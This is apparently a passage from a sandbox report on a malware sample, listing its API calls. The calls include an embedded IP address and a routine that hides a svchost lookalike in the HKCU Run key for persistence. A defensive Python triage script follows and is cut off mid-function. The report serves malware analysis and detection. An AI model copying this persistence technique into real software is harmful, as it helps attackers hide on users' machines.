  • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
  • Part of subcall function 0624180D: SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
  • Part of subcall function 06241AD3: __EH_prolog.LIBCMT ref: 06241AD8
  • Part of subcall function 06241AD3: TerminateThread.KERNEL32(?,000000FF,00000000,00000000,00000000,?,06245626), ref: 06241B00
  • Part of subcall function 06241AD3: CloseHandle.KERNEL32(?,?,06245626), ref: 06241B08
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: H_prolog$CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedObjectSingleStartupTerminateThreadWait_randclosesocketlstrcatsetsockopt
• String ID: 202.79.169.178
• API String ID: 2260043707-4186200246
APIs
• FindWindowA.USER32(CTXOPConntion_Class,00000000), ref: 062435CF
• GetClassNameA.USER32(?,00000000,00000104), ref: 06243602
• GetWindowTextA.USER32(?,?,00000104), ref: 0624362B
• lstrlenA.KERNEL32(?), ref: 06243662
• GetWindow.USER32(?,00000002), ref: 06243691
• lstrlenA.KERNEL32(?), ref: 0624369F
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Window$lstrlen$ClassFindNameText
• String ID: -/-$CTXOPConntion_Class$_
• API String ID: 4118851945-591102176
APIs
• __EH_prolog.LIBCMT ref: 06259395
• GetPropA.USER32(?,AfxOldWndProc423), ref: 062593AD
• CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 0625940B
  • Part of subcall function 06258F78: GetWindowRect.USER32(?,?), ref: 06258F9D
  • Part of subcall function 06258F78: GetWindow.USER32(?,00000004), ref: 06258FBA
• SetWindowLongA.USER32(?,000000FC,?), ref: 0625943B
• RemovePropA.USER32(?,AfxOldWndProc423), ref: 06259443
• GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 0625944A
• GlobalDeleteAtom.KERNEL32(00000000), ref: 06259451
  • Part of subcall function 06258F55: GetWindowRect.USER32(?,?), ref: 06258F61
• CallWindowProcA.USER32(?,?,?,?,00000000), ref: 062594A5
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
• String ID: AfxOldWndProc423
• API String ID: 2397448395-1060338832
APIs
• EnterCriticalSection.KERNEL32(0000001C,06276588,00000100,?,00000000,00000000,0625C863,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?), ref: 0625C5C9
• GlobalAlloc.KERNEL32(00002002,?,?,?,00000000,00000000,0625C863,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?), ref: 0625C61E
• GlobalHandle.KERNEL32(?), ref: 0625C627
• GlobalUnlock.KERNEL32(00000000), ref: 0625C630
• GlobalReAlloc.KERNEL32(00000000,?,00002002), ref: 0625C642
• GlobalHandle.KERNEL32(?), ref: 0625C659
• GlobalLock.KERNEL32(00000000), ref: 0625C660
• LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,0625C863,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?,00000100), ref: 0625C666
• GlobalLock.KERNEL32(?), ref: 0625C675
• LeaveCriticalSection.KERNEL32(?), ref: 0625C6BE
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
• String ID:
• API String ID: 2667261700-0
APIs
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: __aulldiv__aullrem
• String ID: $'$9$@$g$g
• API String ID: 3839614884-2311196974
APIs
• _ValidateLocalCookies.LIBCMT ref: 001D8D97
• ___except_validate_context_record.LIBVCRUNTIME ref: 001D8D9F
• _ValidateLocalCookies.LIBCMT ref: 001D8E28
• __IsNonwritableInCurrentImage.LIBCMT ref: 001D8E53
• _ValidateLocalCookies.LIBCMT ref: 001D8EA8
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 001D8EBE
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 001D8ED3
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
• String ID: csm
• API String ID: 1385549066-1018135373
APIs
• LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06243788
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 062437B8
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 062437D1
• GetFileSize.KERNEL32(00000000,00000000), ref: 062437D9
• _rand.LIBCMT ref: 0624381A
• WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 0624384F
• CloseHandle.KERNEL32(?), ref: 06243860
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleLibraryLoadPointerSizeWrite_rand
• String ID: KERNEL32.dll
• API String ID: 2551126021-254546324
APIs
• LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?,?,?,?,00000000,Function_0000ADE0,0625E518,000000FF,?,06248D0F), ref: 06248F19
• GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 06248F74
• GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 06248F81
• GetProcAddress.KERNEL32(?,CloseDesktop), ref: 06248F8D
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
• API String ID: 2238633743-3711086354
APIs
• SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06242A71
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06242AC4
• GetFileSize.KERNEL32(00000000,00000000), ref: 06242AD1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06242AE3
• lstrlenA.KERNEL32(06242DCE,?,00000000), ref: 06242AF1
• WriteFile.KERNEL32(00000000,06242DCE,00000000), ref: 06242AFC
• CloseHandle.KERNEL32(00000000), ref: 06242B03
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateFolderHandlePathPointerSizeSpecialWritelstrlen
• String ID: .dat
• API String ID: 2901490279-100240174
APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,06250AB7,?,Microsoft Visual C++ Runtime Library,00012010,?,0625EAEC,?,0625EB3C,?,?,?,Runtime Error!Program: ), ref: 062526AA
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 062526C2
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 062526D3
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 062526E0
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
APIs
• GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,0625B2E8,?,00020000), ref: 0625AFF7
• LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 0625B000
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0625B014
• #17.COMCTL32 ref: 0625B02F
• #17.COMCTL32 ref: 0625B04B
• FreeLibrary.KERNEL32(00000000), ref: 0625B057
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeHandleLoadModuleProc
• String ID: COMCTL32.DLL$InitCommonControlsEx
• API String ID: 1437655972-4218389149
APIs
• CompareStringW.KERNEL32(00000000,00000000,0625E7F0,00000001,0625E7F0,00000001,00000000,0641117C,0624AA00,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253268
• CompareStringA.KERNEL32(00000000,00000000,06276150,00000001,06276150,00000001,?,?,?,0624EA70,?,0000000C), ref: 06253285
• CompareStringA.KERNEL32(?,?,00000000,?,0000000C,?,00000000,0641117C,0624AA00,00000000,?,?,?,0624EA70,?,0000000C), ref: 062532E3
• GetCPInfo.KERNEL32(0624EA70,00000000,00000000,0641117C,0624AA00,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253334
• MultiByteToWideChar.KERNEL32(0624EA70,00000009,00000000,?,00000000,00000000,?,?,?,0624EA70,?,0000000C), ref: 062533B3
• MultiByteToWideChar.KERNEL32(0624EA70,00000001,00000000,?,?,?,?,?,?,0624EA70,?,0000000C), ref: 06253414
• MultiByteToWideChar.KERNEL32(0624EA70,00000009,0000000C,?,00000000,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253427
• MultiByteToWideChar.KERNEL32(0624EA70,00000001,0000000C,?,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253473
• CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 0625348B
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: ByteCharCompareMultiStringWide$Info
• String ID:
• API String ID: 1651298574-0
APIs
• LCMapStringW.KERNEL32(00000000,00000100,0625E7F0,00000001,00000000,00000000,7591E860,0627893C,?,00000003,00000000,00000001,00000000,?,?,06253769), ref: 0624E4A3
• LCMapStringA.KERNEL32(00000000,00000100,06276150,00000001,00000000,00000000,?,?,06253769,?), ref: 0624E4BF
• LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,7591E860,0627893C,?,00000003,00000000,00000001,00000000,?,?,06253769), ref: 0624E508
• MultiByteToWideChar.KERNEL32(?,0627893D,00000000,00000001,00000000,00000000,7591E860,0627893C,?,00000003,00000000,00000001,00000000,?,?,06253769), ref: 0624E540
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 0624E598
• LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0624E5AE
• LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 0624E5E1
• LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 0624E649
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: String$ByteCharMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 352835431-0
                                                                                                                    • Opcode ID: 977c2fffa06fc2e142a03e692f9c4c8aac846f421f1a1d29ae0a6bbab0f954c4
                                                                                                                    • Instruction ID: e6c5ac6da681ab9a06991b360ab3ac50bea1f2b7afa988d9644c461ac405dac9
                                                                                                                    • Opcode Fuzzy Hash: 977c2fffa06fc2e142a03e692f9c4c8aac846f421f1a1d29ae0a6bbab0f954c4
                                                                                                                    • Instruction Fuzzy Hash: 34517D3192020AAFEF66AF94DC89DAF7FB6FB48750F124119FE50A1150E7328960DF61
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,001D20C5,001D20C7,00000000,00000000,5EE195CD,?,00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5,?), ref: 001D5909
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,001D20C5,?,00000000,00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5), ref: 001D5984
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001D598F
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D59B8
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D59C2
                                                                                                                    • GetLastError.KERNEL32(80070057,5EE195CD,?,00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5,?), ref: 001D59C7
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D59DA
                                                                                                                    • GetLastError.KERNEL32(00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5,?), ref: 001D59F0
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D5A03
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: de7f4b8dc8d4cb69fb42932e4c51df9a90909edbea24069f71a4f21225f20072
                                                                                                                    • Instruction ID: afaf2a1b7c8b6c5e5cfe5a39056ec2b9f5abdb206eaa0a2f57c521befd4d2f11
                                                                                                                    • Opcode Fuzzy Hash: de7f4b8dc8d4cb69fb42932e4c51df9a90909edbea24069f71a4f21225f20072
                                                                                                                    • Instruction Fuzzy Hash: 07411771A00649DBDB14DFA9CC85BAEBBBAEF44725F14422BF409E7380DB359840C7A5
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,06247EA3), ref: 062480EA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 062480F9
                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,06247EA3), ref: 06248130
                                                                                                                    • GetProcAddress.KERNEL32(?,7459C083), ref: 062481A7
                                                                                                                    • FreeLibrary.KERNEL32(?,06247EA3), ref: 062481E9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressLoadProc$Free
                                                                                                                    • String ID: IsBadReadPtr$kernel32.dll
                                                                                                                    • API String ID: 1413238409-2271619998
                                                                                                                    • Opcode ID: e5d5fe0e6fd475953c6e34d49d255299124f43d5ea35fa3a8eb181f29f3008f8
                                                                                                                    • Instruction ID: fdcc85ca27d7f50633383d16e9929eef577a289b4f71f6cc5c5192db0dce6e51
                                                                                                                    • Opcode Fuzzy Hash: e5d5fe0e6fd475953c6e34d49d255299124f43d5ea35fa3a8eb181f29f3008f8
                                                                                                                    • Instruction Fuzzy Hash: 8D419F71E20206EFEBA4EF55C84476ABBF4EF44354F19806AED59E7240D774EA40CB90
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,06248D56), ref: 06250A00
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,0625EAEC,00000000,00000000,00000000,06248D56), ref: 06250AD6
                                                                                                                    • WriteFile.KERNEL32(00000000), ref: 06250ADD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                                    • Opcode ID: 5f00f32d08bf1cefa37bebd5dfc4dc5a10a736d5dcfb0a1e4c671916ca649d48
                                                                                                                    • Instruction ID: 1960b58a8cfbfe42220fb5a73a106d663e1d4929a4499caaf4a4a2068b4b4cc7
                                                                                                                    • Opcode Fuzzy Hash: 5f00f32d08bf1cefa37bebd5dfc4dc5a10a736d5dcfb0a1e4c671916ca649d48
                                                                                                                    • Instruction Fuzzy Hash: 2531F572A603096FEFB4EA60DC49FAE736DEF45340F160056FE96D6044E670DA80CE52
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000000,?,?), ref: 062445A6
                                                                                                                    • CopyFileA.KERNEL32(00000000,?,00000000), ref: 062445D3
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?), ref: 062445ED
                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000104,?,?), ref: 06244608
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 06244611
                                                                                                                    Strings
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 062445E3
                                                                                                                    • C:\Program Files\Common Files\scvhost.exe, xrefs: 062445AE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCopyModuleNameOpenValue
                                                                                                                    • String ID: C:\Program Files\Common Files\scvhost.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                                    • API String ID: 3295893203-1226825942
                                                                                                                    • Opcode ID: 437ddc7e3be3a5b120398c2a8e24c96383f19e83ca0a80c4d437526644d22a0f
                                                                                                                    • Instruction ID: 9ae901db50c93c21f47cff7f1ade08fe01fc17140aba6ed444babc2754286a4b
                                                                                                                    • Opcode Fuzzy Hash: 437ddc7e3be3a5b120398c2a8e24c96383f19e83ca0a80c4d437526644d22a0f
                                                                                                                    • Instruction Fuzzy Hash: E0115E72A0031CBBEF219AA1ED49FDB7B6DEB04350F0000A2F709E6080DAB15E48CB60
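The function above is the sample's persistence routine: GetModuleFileNameA fetches its own image path, CopyFileA drops a copy as C:\Program Files\Common Files\scvhost.exe (a svchost.exe lookalike), then RegOpenKeyExA(80000001 = HKEY_CURRENT_USER, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, 0, 000F003F = KEY_ALL_ACCESS) and RegSetValueExA(..., type 1 = REG_SZ, cbData 00000104 = MAX_PATH) register it for logon. The script below is an added triage example, not Joe Sandbox output or the sample's code: it reads the HKCU Run key on Windows (and falls back to a constructed set of values elsewhere) and flags entries whose image name is one edit away from a core system binary, carries a system binary name outside the Windows directories, or sits directly in a directory droppers favour. The value names, the non-malicious sample entries, the binary and directory lists and the edit-distance threshold are the author's assumptions, not something the report states.

```python
"""Triage HKCU Run-key persistence for svchost-style lookalikes and odd drop paths.

Added example; the Run value list below is constructed. The first entry is the
path the analysed dropper writes, the rest are invented for contrast.
"""
import ntpath
import sys

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

SAMPLE_RUN_VALUES = {
    "scvhost": r"C:\Program Files\Common Files\scvhost.exe",       # from the report
    "svchost": r"C:\Users\Public\svchost.exe",                      # constructed
    "Steam": r'"C:\Program Files (x86)\Steam\steam.exe" -silent',   # constructed, benign
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",  # constructed, benign
}

# Assumed lists: core binaries malware imitates, where they really live, and
# directories a dropper writes into directly (vendors use sub-folders).
SYSTEM_BINARIES = {
    "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe",
    "smss.exe", "explorer.exe", "rundll32.exe", "conhost.exe", "taskhostw.exe",
}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows"}
DROP_DIRS = {
    r"c:\program files\common files", r"c:\program files (x86)\common files",
    r"c:\users\public", r"c:\programdata", r"c:\windows\temp",
}


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance (Levenshtein plus adjacent transposition),
    so 'scvhost.exe' vs 'svchost.exe' scores 1 rather than 2."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def image_path(command: str) -> str:
    """Extract the executable from a Run value. A quoted path is unambiguous; an
    unquoted one (what a raw REG_SZ path buffer like the sample's produces) is cut
    at the first '.exe', close to how CreateProcess resolves it."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    idx = cmd.lower().find(".exe")
    if idx >= 0:
        return cmd[: idx + 4]
    return cmd.split()[0] if cmd else ""


def triage_run_entries(values: dict) -> dict:
    """Return {value_name: [reasons]} for entries that deserve a closer look."""
    findings = {}
    for name, command in values.items():
        directory, base = ntpath.split(image_path(command))
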